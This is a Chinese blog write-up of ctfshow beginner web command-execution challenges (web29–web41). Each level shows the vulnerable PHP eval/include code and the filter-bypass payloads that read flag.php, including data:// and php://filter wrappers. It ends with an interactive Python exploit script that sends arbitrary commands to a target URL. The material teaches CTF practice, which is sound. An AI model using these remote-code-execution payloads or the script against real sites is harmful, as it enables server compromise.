ctfshow web入门

1|0CTFshow web 入门

1|1命令执行

1|0web29

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:26:48
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
 
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

没啥说的，过滤flag关键字，用通配符替换一下（*代替很多字符，?代替一个字符）,用system命令直接读

也可拼接绕过连续俩单引号就是拼接''

也可以用复制命令把php文件内容cp到txt,然后访问

当然nl也可以代替cp,emmm,就是nl复制出来的有行号

pyload1:?c=system('tac fla?.php|grep ctfshow');

pyload2:?c=system('tac fl''ag.php|grep ctfshow');

pyload3:?c=system('cp fla?.??? 1.txt');然后访问/1.txt

1|0web30

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:42:26
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
 
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag，php字符，system命令

``和passthru都可以起到system的作用,值得注意的是``没有回显要用echo

当然也可以拼接替代通配符，略

pyload:?c=echo`tac fla?.???|grep ctfshow`;

pyload2:?c=passthru("tac f*|grep ctfshow");

1|0web31

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:49:10
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
 
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

过滤了flag,system,php,基础上还过滤了cat，sort，shell，英文句号还有单引号跟空格，cat 可以用nl,tac带替换，nl就是cat 输出多加了行号

上难度了,借鉴Pur3师傅的绕过姿势

用tab代替空格，tab的url编码为%09,空格为%20

payload：?c=passthru("more%09fl*");

在借鉴一下大菜鸡师傅的逃逸执行,逃逸之后想干啥敢杀，直接无视过滤

pyload:?c=eval($_GET('a'));&a=passthru("more%09fl*");右键查看源代码

1|0web32

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 00:56:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
 
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

emmm,又多过滤了echo,分号还有左括号,反引号

问题不大,我们用include来文件包含绕过,include不用括号

;可以用?>代替，因为php语言最后一句话可以不用;结尾

pyload:?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

然后base64解码即可

1|0web33

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 02:22:27
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
//
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

虽然多过滤了双引号，无聊，这跟上题一样的思路即可

题无聊，人有趣呀，咱用data://协议命令执行一下吧

pyload1:?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

pyload2:?c=include%0a$_POST[a]?>

post:a=data://text/plain,<?php eval(system("tac flag.php"))?>

1|0web34

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

比上题多过滤了冒号，但是无所谓，上题俩pyload依然通杀

pyload1:?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

pyload2:?c=include%0a$_POST[a]?>

post:a=data://text/plain,<?php eval(system("tac flag.php"))?>

1|0web35

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

比上题又多过滤了<和=,感觉还能用？

果然如此。。。。

pyload1:?c=include%0a$_GET[1]?>&1=php://filter/convert.base64-encode/resource=flag.php

pyload2:?c=include%0a$_POST[a]?>

post:a=data://text/plain,<?php eval(system("tac flag.php"))?>

1|0web36

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 04:21:16
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
 
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}

这比上面多过滤了/和数字，障眼法，pyload依然能用，把1改为字母即可

pyload1:?c=include%0a$_GET[a]?>&a=php://filter/convert.base64-encode/resource=flag.php

pyload2:?c=include%0a$_POST[a]?>

post:a=data://text/plain,<?php eval(system("tac flag.php"))?>

1|0web37,分割上面

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
 
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

大致意思是，判断有没有传c参数，有的话赋值给 $c, 然后 i n c l u d e 文件包含$ c,过滤了flag关键字，include不能用通配符，直接日志注入传马即可，略。

看一下大菜鸡师傅的

 data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

用base64编码绕过flag关键字过滤，高实在是高

其实，通配符直接替换即可哈哈哈

?c=data://text/plainc,

1|0web38

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
 
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

禁用php,但是php根本没有用好吧，不禁用也没用

障眼法，上题pyload直接杀

pyload1:data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

pyload2:?c=data://text/plainc,

1|0web39

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:13:21
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
 
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}

这有意思了，它将我们传入的参数拼接了后缀（.在php里可以用来拼接字符串），但是无所谓，思路就是截断，直接无视拼接把?>加上即可，因为php文件结尾是?>

?c=data://text/plainc,?>

看下大菜鸡师傅的解释发现多此一举

data://text/plain, 这样就相当于执行了php语句 .php 因为前面的php语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，起不到什么作用，不用再闭合一次

障眼法

pyload:?c=data://text/plainc,

1|0web40，难度

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 06:03:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
 
 
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}

大眼一看，过滤的挺狠，咱也不知道还剩啥能用的字符

直接去瞅一瞅wp走起

get_defined_vars()此函数返回一个包含所有已定义变量列表的多维数组，这些变量包括环境变量、服务器变量和用户定义的变量。

print_r() 显示关于一个变量的易于理解的信息。如果给出的是 string、integer 或 float，将打印变量值本身。如果给出的是 array，将会按照一定格式显示键和元素。object 与数组类似。

next() 和 current() 的行为类似，只有一点区别，在返回值之前将内部指针向前移动一位。这意味着它返回的是下一个数组单元的值并将数组指针向前移动了一位。

pyload:?c=eval(array_pop(next(get_defined_vars())));

post:system("tac flag.php")

1|0web41.羽

 <?php
 
/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show
 
*/
 
if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>

这个题过滤了$、+、-、^、~使得异或自增和取反构造字符都无法使用，同时过滤了字母和数字。但是特意留了个或运算符|。
我们可以尝试从ascii为0-255的字符中，找到或运算能得到我们可用的字符的字符。
这里先给出两个脚本 exp.py rce_or.php，大家以后碰到可以使用或运算绕过的可以自己手动修改下即可。
生成可用字符的集合

 <?php
$myfile = fopen("rce_or.txt", "w");
$contents="";
for ($i=0; $i < 256; $i++) { 
	for ($j=0; $j <256 ; $j++) { 
 
		if($i<16){
			$hex_i='0'.dechex($i);
		}
		else{
			$hex_i=dechex($i);
		}
		if($j<16){
			$hex_j='0'.dechex($j);
		}
		else{
			$hex_j=dechex($j);
		}
		$preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i';
		if(preg_match($preg , hex2bin($hex_i))||preg_match($preg , hex2bin($hex_j))){
					echo "";
    }
  
		else{
		$a='%'.$hex_i;
		$b='%'.$hex_j;
		$c=(urldecode($a)|urldecode($b));
		if (ord($c)>=32&ord($c)<=126) {
			$contents=$contents.$c." ".$a." ".$b."\n";
		}
	}
 
}
}
fwrite($myfile,$contents);
fclose($myfile);

大体意思就是从进行异或的字符中排除掉被过滤的，然后在判断异或得到的字符是否为可见字符
传递参数getflag
用法 python exp.py <url>

 # -*- coding: utf-8 -*-
import requests
import urllib
from sys import *
import os
os.system("php rce_or.php")  #没有将php写入环境变量需手动运行
if(len(argv)!=2):
   print("="*50)
   print('USER：python exp.py <url>')
   print("eg：  python exp.py http://ctf.show/")
   print("="*50)
   exit(0)
url=argv[1]
def action(arg):
   s1=""
   s2=""
   for i in arg:
       f=open("rce_or.txt","r")
       while True:
           t=f.readline()
           if t=="":
               break
           if t[0]==i:
               #print(i)
               s1+=t[2:5]
               s2+=t[6:9]
               break
       f.close()
   output="(\""+s1+"\"|\""+s2+"\")"
   return(output)
   
while True:
   param=action(input("\n[+] your function：") )+action(input("[+] your command："))
   data={
       'c':urllib.parse.unquote(param)
       }
   r=requests.post(url,data=data)
   print("\n[*] result:\n"+r.text)

__EOF__

本文作者：yanhuoyu
本文链接：https://www.cnblogs.com/yanhuoyu/p/17493423.html
关于博主：评论和私信会在第一时间回复。或者直接私信我。
版权声明：本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！
声援博主：如果您觉得文章对您有帮助，可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力！

posted @ 2023-06-20 14:19 烟火梦雨阅读(100) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

相关博文：

· 关于Hack the box靶场起点Meow复习

· 第八章简答

· ctfshow命令执行全部wp

· ctfshow web入门命令执行39-43

· ctfshow web入门部分题目（更新中）

阅读排行：
· 全程不用写代码，我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了，比商业数据库还牛
· .NET10 - 预览版1新功能体验（一）

公告

ctfshow web入门

发表于 2023-06-20 14:19阅读次数：100评论次数：0

关注

跳至底部

昵称：烟火梦雨
园龄： 2年6个月
粉丝： 0
关注： 0

+加关注

随笔档案 (3)

文章分类 (2)

文章(2)

烟火梦雨

嗨，我的朋友们

ctfshow web入门

1|0CTFshow web 入门

1|1命令执行

1|0web29

1|0web30

1|0web31

1|0web32

1|0web33

1|0web34

1|0web35

1|0web36

1|0web37,分割上面

1|0web38

1|0web39

1|0web40，难度

1|0web41.羽

公告

yanhuoyu

ctfshow web入门

常用链接

随笔档案 (3)

文章分类 (2)

阅读排行榜

最新评论

	<?php

	/*
	# -- coding: utf-8 --
	# @Author: h1xa
	# @Date: 2020-09-04 00:12:34
	# @Last Modified by: h1xa
	# @Last Modified time: 2020-09-04 00:26:48
	# @email: h1xa@ctfer.com
	# @link: https://ctfer.com

	*/

	error_reporting(0);
	if(isset($_GET['c'])){
	$c = $_GET['c'];
	if(!preg_match("/flag/i", $c)){
	eval($c);
	}

	}else{
	highlight_file(__FILE__);
	}

	<?php

	/*
	# -- coding: utf-8 --
	# @Author: 羽
	# @Date: 2020-09-05 20:31:22
	# @Last Modified by: h1xa
	# @Last Modified time: 2020-09-05 22:40:07
	# @email: 1341963450@qq.com
	# @link: https://ctf.show

	*/

	if(isset($_POST['c'])){
	$c = $_POST['c'];
	if(!preg_match('/[0-9]\|[a-z]\|\^\|\+\|\~\|\$\|\[\|\]\|\{\|\}\|\&\|\-/i', $c)){
	eval("echo($c);");
	}
	}else{
	highlight_file(__FILE__);
	}
	?>

	<?php
	$myfile = fopen("rce_or.txt", "w");
	$contents="";
	for ($i=0; $i < 256; $i++) {
	for ($j=0; $j <256 ; $j++) {

	if($i<16){
	$hex_i='0'.dechex($i);
	}
	else{
	$hex_i=dechex($i);
	}
	if($j<16){
	$hex_j='0'.dechex($j);
	}
	else{
	$hex_j=dechex($j);
	}
	$preg = '/[0-9]\|[a-z]\|\^\|\+\|\~\|\$\|\[\|\]\|\{\|\}\|\&\|\-/i';
	if(preg_match($preg , hex2bin($hex_i))\|\|preg_match($preg , hex2bin($hex_j))){
	echo "";
	}

	else{
	$a='%'.$hex_i;
	$b='%'.$hex_j;
	$c=(urldecode($a)\|urldecode($b));
	if (ord($c)>=32&ord($c)<=126) {
	$contents=$contents.$c." ".$a." ".$b."\n";
	}
	}

	}
	}
	fwrite($myfile,$contents);
	fclose($myfile);

	# -- coding: utf-8 --
	import requests
	import urllib
	from sys import *
	import os
	os.system("php rce_or.php") #没有将php写入环境变量需手动运行
	if(len(argv)!=2):
	print("="*50)
	print('USER：python exp.py <url>')
	print("eg： python exp.py http://ctf.show/")
	print("="*50)
	exit(0)
	url=argv[1]
	def action(arg):
	s1=""
	s2=""
	for i in arg:
	f=open("rce_or.txt","r")
	while True:
	t=f.readline()
	if t=="":
	break
	if t[0]==i:
	#print(i)
	s1+=t[2:5]
	s2+=t[6:9]
	break
	f.close()
	output="(\""+s1+"\"\|\""+s2+"\")"
	return(output)

	while True:
	param=action(input("\n[+] your function：") )+action(input("[+] your command："))
	data={
	'c':urllib.parse.unquote(param)
	}
	r=requests.post(url,data=data)
	print("\n[*] result:\n"+r.text)